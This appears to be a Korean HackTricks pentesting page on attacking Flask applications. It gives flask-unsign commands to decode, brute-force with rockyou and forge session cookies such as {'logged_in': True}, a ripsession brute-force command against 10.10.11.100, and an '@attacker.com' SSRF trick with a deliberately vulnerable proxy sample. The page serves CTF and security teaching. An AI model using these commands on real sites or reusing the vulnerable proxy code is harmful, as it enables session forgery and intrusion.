Flask

Tip

AWS Hacking을 배우고 연습하세요:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요: HackTricks Training Azure Red Team Expert (AzRTE) 평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.

HackTricks 지원하기

• subscription plans를 확인하세요!
• 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
• HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.

아마도 CTF를 플레이할 때 Flask 애플리케이션은 SSTI와 관련될 가능성이 큽니다.

쿠키

기본 쿠키 세션 이름은 session.

디코더

온라인 Flask 쿠키 디코더: https://www.kirsle.net/wizards/flask-session.cgi

수동

쿠키의 첫 번째 점(.)까지의 첫 부분을 가져와 Base64로 디코딩합니다:

echo "ImhlbGxvIg" | base64 -d

쿠키는 또한 비밀번호로 서명되어 있습니다

Flask-Unsign

시크릿 키를 추측하여 Flask 애플리케이션의 세션 쿠키를 가져오고, 디코드하고, brute-force로 해독하며, 생성하는 명령줄 도구.

Client Challenge

pip3 install flask-unsign

Decode Cookie

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

서명

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

레거시(구버전)를 사용한 서명

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

flask-unsign으로 생성한 cookies를 사용해 웹사이트를 brute-force하는 명령줄 도구.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign. \xc2\xb7 GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

Flask 세션 쿠키에서의 SQLi (SQLmap 사용)

이 예제는 알려진 secret을 사용하여 flask용 sqlmap payloads에 자동으로 서명하기 위해 sqlmap의 eval 옵션을 사용합니다.

Flask 프록시를 통한 SSRF

이 글에서는 Flask가 ‘@’ 문자로 시작하는 요청을 허용하는 방법을 설명합니다:

GET @/ HTTP/1.1
Host: target.com
Connection: close

다음 시나리오에서는:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

예를 들어 “@attacker.com“과 같은 값을 허용하면 SSRF를 유발할 수 있습니다.

Tip

AWS Hacking을 배우고 연습하세요:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요: HackTricks Training Azure Red Team Expert (AzRTE) 평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.

HackTricks 지원하기

• subscription plans를 확인하세요!
• 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
• HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.